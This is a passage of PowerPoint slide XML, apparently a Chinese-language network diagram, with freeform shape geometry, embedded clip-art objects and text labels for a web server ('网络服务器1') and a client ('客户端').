                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1942"/>
                  <a:gd name="T1" fmla="*/ 0 h 1028"/>
                  <a:gd name="T2" fmla="*/ 0 w 1942"/>
                  <a:gd name="T3" fmla="*/ 0 h 1028"/>
                  <a:gd name="T4" fmla="*/ 0 w 1942"/>
                  <a:gd name="T5" fmla="*/ 0 h 1028"/>
                  <a:gd name="T6" fmla="*/ 0 w 1942"/>
                  <a:gd name="T7" fmla="*/ 0 h 1028"/>
                  <a:gd name="T8" fmla="*/ 0 w 1942"/>
                  <a:gd name="T9" fmla="*/ 0 h 1028"/>
                  <a:gd name="T10" fmla="*/ 0 w 1942"/>
                  <a:gd name="T11" fmla="*/ 0 h 1028"/>
                  <a:gd name="T12" fmla="*/ 0 w 1942"/>
                  <a:gd name="T13" fmla="*/ 0 h 1028"/>
                  <a:gd name="T14" fmla="*/ 0 w 1942"/>
                  <a:gd name="T15" fmla="*/ 0 h 1028"/>
                  <a:gd name="T16" fmla="*/ 0 w 1942"/>
                  <a:gd name="T17" fmla="*/ 0 h 1028"/>
                  <a:gd name="T18" fmla="*/ 0 w 1942"/>
                  <a:gd name="T19" fmla="*/ 0 h 1028"/>
                  <a:gd name="T20" fmla="*/ 0 w 1942"/>
                  <a:gd name="T21" fmla="*/ 0 h 1028"/>
                  <a:gd name="T22" fmla="*/ 0 w 1942"/>
                  <a:gd name="T23" fmla="*/ 0 h 1028"/>
                  <a:gd name="T24" fmla="*/ 0 w 1942"/>
                  <a:gd name="T25" fmla="*/ 0 h 1028"/>
                  <a:gd name="T26" fmla="*/ 0 w 1942"/>
                  <a:gd name="T27" fmla="*/ 0 h 1028"/>
                  <a:gd name="T28" fmla="*/ 0 w 1942"/>
                  <a:gd name="T29" fmla="*/ 0 h 1028"/>
                  <a:gd name="T30" fmla="*/ 0 w 1942"/>
                  <a:gd name="T31" fmla="*/ 0 h 1028"/>
                  <a:gd name="T32" fmla="*/ 0 w 1942"/>
                  <a:gd name="T33" fmla="*/ 0 h 1028"/>
                  <a:gd name="T34" fmla="*/ 0 w 1942"/>
                  <a:gd name="T35" fmla="*/ 0 h 1028"/>
                  <a:gd name="T36" fmla="*/ 0 w 1942"/>
                  <a:gd name="T37" fmla="*/ 0 h 1028"/>
                  <a:gd name="T38" fmla="*/ 0 w 1942"/>
                  <a:gd name="T39" fmla="*/ 0 h 1028"/>
                  <a:gd name="T40" fmla="*/ 0 w 1942"/>
                  <a:gd name="T41" fmla="*/ 0 h 1028"/>
                  <a:gd name="T42" fmla="*/ 0 w 1942"/>
                  <a:gd name="T43" fmla="*/ 0 h 1028"/>
                  <a:gd name="T44" fmla="*/ 0 w 1942"/>
                  <a:gd name="T45" fmla="*/ 0 h 1028"/>
                  <a:gd name="T46" fmla="*/ 0 w 1942"/>
                  <a:gd name="T47" fmla="*/ 0 h 1028"/>
                  <a:gd name="T48" fmla="*/ 0 w 1942"/>
                  <a:gd name="T49" fmla="*/ 0 h 1028"/>
                  <a:gd name="T50" fmla="*/ 0 w 1942"/>
                  <a:gd name="T51" fmla="*/ 0 h 1028"/>
                  <a:gd name="T52" fmla="*/ 0 w 1942"/>
                  <a:gd name="T53" fmla="*/ 0 h 1028"/>
                  <a:gd name="T54" fmla="*/ 0 w 1942"/>
                  <a:gd name="T55" fmla="*/ 0 h 1028"/>
                  <a:gd name="T56" fmla="*/ 0 w 1942"/>
                  <a:gd name="T57" fmla="*/ 0 h 1028"/>
                  <a:gd name="T58" fmla="*/ 0 w 1942"/>
                  <a:gd name="T59" fmla="*/ 0 h 1028"/>
                  <a:gd name="T60" fmla="*/ 0 w 1942"/>
                  <a:gd name="T61" fmla="*/ 0 h 1028"/>
                  <a:gd name="T62" fmla="*/ 0 w 1942"/>
                  <a:gd name="T63" fmla="*/ 0 h 1028"/>
                  <a:gd name="T64" fmla="*/ 0 w 1942"/>
                  <a:gd name="T65" fmla="*/ 0 h 1028"/>
                  <a:gd name="T66" fmla="*/ 0 w 1942"/>
                  <a:gd name="T67" fmla="*/ 0 h 1028"/>
                  <a:gd name="T68" fmla="*/ 0 w 1942"/>
                  <a:gd name="T69" fmla="*/ 0 h 1028"/>
                  <a:gd name="T70" fmla="*/ 0 w 1942"/>
                  <a:gd name="T71" fmla="*/ 0 h 1028"/>
                  <a:gd name="T72" fmla="*/ 0 w 1942"/>
                  <a:gd name="T73" fmla="*/ 0 h 1028"/>
                  <a:gd name="T74" fmla="*/ 0 w 1942"/>
                  <a:gd name="T75" fmla="*/ 0 h 1028"/>
                  <a:gd name="T76" fmla="*/ 0 w 1942"/>
                  <a:gd name="T77" fmla="*/ 0 h 1028"/>
                  <a:gd name="T78" fmla="*/ 0 w 1942"/>
                  <a:gd name="T79" fmla="*/ 0 h 1028"/>
                  <a:gd name="T80" fmla="*/ 0 w 1942"/>
                  <a:gd name="T81" fmla="*/ 0 h 1028"/>
                  <a:gd name="T82" fmla="*/ 0 w 1942"/>
                  <a:gd name="T83" fmla="*/ 0 h 1028"/>
                  <a:gd name="T84" fmla="*/ 0 w 1942"/>
                  <a:gd name="T85" fmla="*/ 0 h 1028"/>
                  <a:gd name="T86" fmla="*/ 0 w 1942"/>
                  <a:gd name="T87" fmla="*/ 0 h 1028"/>
                  <a:gd name="T88" fmla="*/ 0 w 1942"/>
                  <a:gd name="T89" fmla="*/ 0 h 1028"/>
                  <a:gd name="T90" fmla="*/ 0 w 1942"/>
                  <a:gd name="T91" fmla="*/ 0 h 1028"/>
                  <a:gd name="T92" fmla="*/ 0 w 1942"/>
                  <a:gd name="T93" fmla="*/ 0 h 1028"/>
                  <a:gd name="T94" fmla="*/ 0 w 1942"/>
                  <a:gd name="T95" fmla="*/ 0 h 1028"/>
                  <a:gd name="T96" fmla="*/ 0 w 1942"/>
                  <a:gd name="T97" fmla="*/ 0 h 1028"/>
                  <a:gd name="T98" fmla="*/ 0 w 1942"/>
                  <a:gd name="T99" fmla="*/ 0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8" name="Freeform 42">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30D70716-275D-127C-17A9-C17698E5A02D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2160" y="3361"/>
                <a:ext cx="197" cy="367"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 985"/>
                  <a:gd name="T1" fmla="*/ 0 h 1832"/>
                  <a:gd name="T2" fmla="*/ 0 w 985"/>
                  <a:gd name="T3" fmla="*/ 0 h 1832"/>
                  <a:gd name="T4" fmla="*/ 0 w 985"/>
                  <a:gd name="T5" fmla="*/ 0 h 1832"/>
                  <a:gd name="T6" fmla="*/ 0 w 985"/>
                  <a:gd name="T7" fmla="*/ 0 h 1832"/>
                  <a:gd name="T8" fmla="*/ 0 w 985"/>
                  <a:gd name="T9" fmla="*/ 0 h 1832"/>
                  <a:gd name="T10" fmla="*/ 0 w 985"/>
                  <a:gd name="T11" fmla="*/ 0 h 1832"/>
                  <a:gd name="T12" fmla="*/ 0 w 985"/>
                  <a:gd name="T13" fmla="*/ 0 h 1832"/>
                  <a:gd name="T14" fmla="*/ 0 w 985"/>
                  <a:gd name="T15" fmla="*/ 0 h 1832"/>
                  <a:gd name="T16" fmla="*/ 0 w 985"/>
                  <a:gd name="T17" fmla="*/ 0 h 1832"/>
                  <a:gd name="T18" fmla="*/ 0 w 985"/>
                  <a:gd name="T19" fmla="*/ 0 h 1832"/>
                  <a:gd name="T20" fmla="*/ 0 w 985"/>
                  <a:gd name="T21" fmla="*/ 0 h 1832"/>
                  <a:gd name="T22" fmla="*/ 0 w 985"/>
                  <a:gd name="T23" fmla="*/ 0 h 1832"/>
                  <a:gd name="T24" fmla="*/ 0 w 985"/>
                  <a:gd name="T25" fmla="*/ 0 h 1832"/>
                  <a:gd name="T26" fmla="*/ 0 w 985"/>
                  <a:gd name="T27" fmla="*/ 0 h 1832"/>
                  <a:gd name="T28" fmla="*/ 0 w 985"/>
                  <a:gd name="T29" fmla="*/ 0 h 1832"/>
                  <a:gd name="T30" fmla="*/ 0 w 985"/>
                  <a:gd name="T31" fmla="*/ 0 h 1832"/>
                  <a:gd name="T32" fmla="*/ 0 w 985"/>
                  <a:gd name="T33" fmla="*/ 0 h 1832"/>
                  <a:gd name="T34" fmla="*/ 0 w 985"/>
                  <a:gd name="T35" fmla="*/ 0 h 1832"/>
                  <a:gd name="T36" fmla="*/ 0 w 985"/>
                  <a:gd name="T37" fmla="*/ 0 h 1832"/>
                  <a:gd name="T38" fmla="*/ 0 w 985"/>
                  <a:gd name="T39" fmla="*/ 0 h 1832"/>
                  <a:gd name="T40" fmla="*/ 0 w 985"/>
                  <a:gd name="T41" fmla="*/ 0 h 1832"/>
                  <a:gd name="T42" fmla="*/ 0 w 985"/>
                  <a:gd name="T43" fmla="*/ 0 h 1832"/>
                  <a:gd name="T44" fmla="*/ 0 w 985"/>
                  <a:gd name="T45" fmla="*/ 0 h 1832"/>
                  <a:gd name="T46" fmla="*/ 0 w 985"/>
                  <a:gd name="T47" fmla="*/ 0 h 1832"/>
                  <a:gd name="T48" fmla="*/ 0 w 985"/>
                  <a:gd name="T49" fmla="*/ 0 h 1832"/>
                  <a:gd name="T50" fmla="*/ 0 w 985"/>
                  <a:gd name="T51" fmla="*/ 0 h 1832"/>
                  <a:gd name="T52" fmla="*/ 0 w 985"/>
                  <a:gd name="T53" fmla="*/ 0 h 1832"/>
                  <a:gd name="T54" fmla="*/ 0 w 985"/>
                  <a:gd name="T55" fmla="*/ 0 h 1832"/>
                  <a:gd name="T56" fmla="*/ 0 w 985"/>
                  <a:gd name="T57" fmla="*/ 0 h 1832"/>
                  <a:gd name="T58" fmla="*/ 0 w 985"/>
                  <a:gd name="T59" fmla="*/ 0 h 1832"/>
                  <a:gd name="T60" fmla="*/ 0 w 985"/>
                  <a:gd name="T61" fmla="*/ 0 h 1832"/>
                  <a:gd name="T62" fmla="*/ 0 w 985"/>
                  <a:gd name="T63" fmla="*/ 0 h 1832"/>
                  <a:gd name="T64" fmla="*/ 0 w 985"/>
                  <a:gd name="T65" fmla="*/ 0 h 1832"/>
                  <a:gd name="T66" fmla="*/ 0 w 985"/>
                  <a:gd name="T67" fmla="*/ 0 h 1832"/>
                  <a:gd name="T68" fmla="*/ 0 w 985"/>
                  <a:gd name="T69" fmla="*/ 0 h 1832"/>
                  <a:gd name="T70" fmla="*/ 0 w 985"/>
                  <a:gd name="T71" fmla="*/ 0 h 1832"/>
                  <a:gd name="T72" fmla="*/ 0 w 985"/>
                  <a:gd name="T73" fmla="*/ 0 h 1832"/>
                  <a:gd name="T74" fmla="*/ 0 w 985"/>
                  <a:gd name="T75" fmla="*/ 0 h 1832"/>
                  <a:gd name="T76" fmla="*/ 0 w 985"/>
                  <a:gd name="T77" fmla="*/ 0 h 1832"/>
                  <a:gd name="T78" fmla="*/ 0 w 985"/>
                  <a:gd name="T79" fmla="*/ 0 h 1832"/>
                  <a:gd name="T80" fmla="*/ 0 w 985"/>
                  <a:gd name="T81" fmla="*/ 0 h 1832"/>
                  <a:gd name="T82" fmla="*/ 0 w 985"/>
                  <a:gd name="T83" fmla="*/ 0 h 1832"/>
                  <a:gd name="T84" fmla="*/ 0 w 985"/>
                  <a:gd name="T85" fmla="*/ 0 h 1832"/>
                  <a:gd name="T86" fmla="*/ 0 w 985"/>
                  <a:gd name="T87" fmla="*/ 0 h 1832"/>
                  <a:gd name="T88" fmla="*/ 0 w 985"/>
                  <a:gd name="T89" fmla="*/ 0 h 1832"/>
                  <a:gd name="T90" fmla="*/ 0 w 985"/>
                  <a:gd name="T91" fmla="*/ 0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179" name="Freeform 43">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78B7E5B7-10C9-E08D-B469-90CD78388CCE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2312" y="3312"/>
                <a:ext cx="293" cy="331"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1464"/>
                  <a:gd name="T1" fmla="*/ 0 h 1658"/>
                  <a:gd name="T2" fmla="*/ 0 w 1464"/>
                  <a:gd name="T3" fmla="*/ 0 h 1658"/>
                  <a:gd name="T4" fmla="*/ 0 w 1464"/>
                  <a:gd name="T5" fmla="*/ 0 h 1658"/>
                  <a:gd name="T6" fmla="*/ 0 w 1464"/>
                  <a:gd name="T7" fmla="*/ 0 h 1658"/>
                  <a:gd name="T8" fmla="*/ 0 w 1464"/>
                  <a:gd name="T9" fmla="*/ 0 h 1658"/>
                  <a:gd name="T10" fmla="*/ 0 w 1464"/>
                  <a:gd name="T11" fmla="*/ 0 h 1658"/>
                  <a:gd name="T12" fmla="*/ 0 w 1464"/>
                  <a:gd name="T13" fmla="*/ 0 h 1658"/>
                  <a:gd name="T14" fmla="*/ 0 w 1464"/>
                  <a:gd name="T15" fmla="*/ 0 h 1658"/>
                  <a:gd name="T16" fmla="*/ 0 w 1464"/>
                  <a:gd name="T17" fmla="*/ 0 h 1658"/>
                  <a:gd name="T18" fmla="*/ 0 w 1464"/>
                  <a:gd name="T19" fmla="*/ 0 h 1658"/>
                  <a:gd name="T20" fmla="*/ 0 w 1464"/>
                  <a:gd name="T21" fmla="*/ 0 h 1658"/>
                  <a:gd name="T22" fmla="*/ 0 w 1464"/>
                  <a:gd name="T23" fmla="*/ 0 h 1658"/>
                  <a:gd name="T24" fmla="*/ 0 w 1464"/>
                  <a:gd name="T25" fmla="*/ 0 h 1658"/>
                  <a:gd name="T26" fmla="*/ 0 w 1464"/>
                  <a:gd name="T27" fmla="*/ 0 h 1658"/>
                  <a:gd name="T28" fmla="*/ 0 w 1464"/>
                  <a:gd name="T29" fmla="*/ 0 h 1658"/>
                  <a:gd name="T30" fmla="*/ 0 w 1464"/>
                  <a:gd name="T31" fmla="*/ 0 h 1658"/>
                  <a:gd name="T32" fmla="*/ 0 w 1464"/>
                  <a:gd name="T33" fmla="*/ 0 h 1658"/>
                  <a:gd name="T34" fmla="*/ 0 w 1464"/>
                  <a:gd name="T35" fmla="*/ 0 h 1658"/>
                  <a:gd name="T36" fmla="*/ 0 w 1464"/>
                  <a:gd name="T37" fmla="*/ 0 h 1658"/>
                  <a:gd name="T38" fmla="*/ 0 w 1464"/>
                  <a:gd name="T39" fmla="*/ 0 h 1658"/>
                  <a:gd name="T40" fmla="*/ 0 w 1464"/>
                  <a:gd name="T41" fmla="*/ 0 h 1658"/>
                  <a:gd name="T42" fmla="*/ 0 w 1464"/>
                  <a:gd name="T43" fmla="*/ 0 h 1658"/>
                  <a:gd name="T44" fmla="*/ 0 w 1464"/>
                  <a:gd name="T45" fmla="*/ 0 h 1658"/>
                  <a:gd name="T46" fmla="*/ 0 w 1464"/>
                  <a:gd name="T47" fmla="*/ 0 h 1658"/>
                  <a:gd name="T48" fmla="*/ 0 w 1464"/>
                  <a:gd name="T49" fmla="*/ 0 h 1658"/>
                  <a:gd name="T50" fmla="*/ 0 w 1464"/>
                  <a:gd name="T51" fmla="*/ 0 h 1658"/>
                  <a:gd name="T52" fmla="*/ 0 w 1464"/>
                  <a:gd name="T53" fmla="*/ 0 h 1658"/>
                  <a:gd name="T54" fmla="*/ 0 w 1464"/>
                  <a:gd name="T55" fmla="*/ 0 h 1658"/>
                  <a:gd name="T56" fmla="*/ 0 w 1464"/>
                  <a:gd name="T57" fmla="*/ 0 h 1658"/>
                  <a:gd name="T58" fmla="*/ 0 w 1464"/>
                  <a:gd name="T59" fmla="*/ 0 h 1658"/>
                  <a:gd name="T60" fmla="*/ 0 w 1464"/>
                  <a:gd name="T61" fmla="*/ 0 h 1658"/>
                  <a:gd name="T62" fmla="*/ 0 w 1464"/>
                  <a:gd name="T63" fmla="*/ 0 h 1658"/>
                  <a:gd name="T64" fmla="*/ 0 w 1464"/>
                  <a:gd name="T65" fmla="*/ 0 h 1658"/>
                  <a:gd name="T66" fmla="*/ 0 w 1464"/>
                  <a:gd name="T67" fmla="*/ 0 h 1658"/>
                  <a:gd name="T68" fmla="*/ 0 w 1464"/>
                  <a:gd name="T69" fmla="*/ 0 h 1658"/>
                  <a:gd name="T70" fmla="*/ 0 w 1464"/>
                  <a:gd name="T71" fmla="*/ 0 h 1658"/>
                  <a:gd name="T72" fmla="*/ 0 w 1464"/>
                  <a:gd name="T73" fmla="*/ 0 h 1658"/>
                  <a:gd name="T74" fmla="*/ 0 w 1464"/>
                  <a:gd name="T75" fmla="*/ 0 h 1658"/>
                  <a:gd name="T76" fmla="*/ 0 w 1464"/>
                  <a:gd name="T77" fmla="*/ 0 h 1658"/>
                  <a:gd name="T78" fmla="*/ 0 w 1464"/>
                  <a:gd name="T79" fmla="*/ 0 h 1658"/>
                  <a:gd name="T80" fmla="*/ 0 w 1464"/>
                  <a:gd name="T81" fmla="*/ 0 h 1658"/>
                  <a:gd name="T82" fmla="*/ 0 w 1464"/>
                  <a:gd name="T83" fmla="*/ 0 h 1658"/>
                  <a:gd name="T84" fmla="*/ 0 w 1464"/>
                  <a:gd name="T85" fmla="*/ 0 h 1658"/>
                  <a:gd name="T86" fmla="*/ 0 w 1464"/>
                  <a:gd name="T87" fmla="*/ 0 h 1658"/>
                  <a:gd name="T88" fmla="*/ 0 w 1464"/>
                  <a:gd name="T89" fmla="*/ 0 h 1658"/>
                  <a:gd name="T90" fmla="*/ 0 w 1464"/>
                  <a:gd name="T91" fmla="*/ 0 h 1658"/>
                  <a:gd name="T92" fmla="*/ 0 w 1464"/>
                  <a:gd name="T93" fmla="*/ 0 h 1658"/>
                  <a:gd name="T94" fmla="*/ 0 w 1464"/>
                  <a:gd name="T95" fmla="*/ 0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grpSp>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="175" name="Object 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41E3F22A-FC85-3818-9617-55A02C93AA42}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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6363" name="Clip" r:id="rId20" imgW="1270571" imgH="967141" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId20" imgW="1270571" imgH="967141" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="175" name="Object 106">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41E3F22A-FC85-3818-9617-55A02C93AA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0" name="Object 107">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB8B113-230D-4B68-926F-3ED6FBC65039}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3678246" y="5751272"/>
          <a:ext cx="575826" cy="442109"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6364" name="Clip" r:id="rId21" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId21" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="180" name="Object 107">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB8B113-230D-4B68-926F-3ED6FBC650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8246" y="5751272"/>
                        <a:ext cx="575826" cy="442109"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="181" name="Object 108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{556CA0F7-CCAD-5299-4147-1FAB6CEB729B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5410345" y="5807391"/>
          <a:ext cx="291527" cy="224066"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6365" name="Clip" r:id="rId22" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId22" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="181" name="Object 108">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{556CA0F7-CCAD-5299-4147-1FAB6CEB72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345" y="5807391"/>
                        <a:ext cx="291527" cy="224066"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Text Box 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9869E7EF-2A3A-9F63-4D04-E971C6127F64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8997528" y="4498608"/>
            <a:ext cx="16659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latinLnBrk="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="183" name="Object 109">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DA57A39-9219-1B0B-9AF3-1699AE92266F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="9003878" y="5028874"/>
          <a:ext cx="1498594" cy="1188997"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6366" name="Clip" r:id="rId23" imgW="3277824" imgH="2598524" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId23" imgW="3277824" imgH="2598524" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="183" name="Object 109">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DA57A39-9219-1B0B-9AF3-1699AE9226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878" y="5028874"/>
                        <a:ext cx="1498594" cy="1188997"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="AutoShape 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF8D686F-EB23-D4B9-7F6D-04F330EE0AB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="6606673" y="4278783"/>
            <a:ext cx="323030" cy="3353767"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 94071"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="folHlink">
              <a:alpha val="50195"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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185" name="Text Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9AA2316-497C-87A8-5840-DACEE99F87EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2658402" y="4952572"/>
            <a:ext cx="10513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latinLnBrk="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>客户端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Text Box 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF4D8A79-6482-3366-1095-71ECC18D1C3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
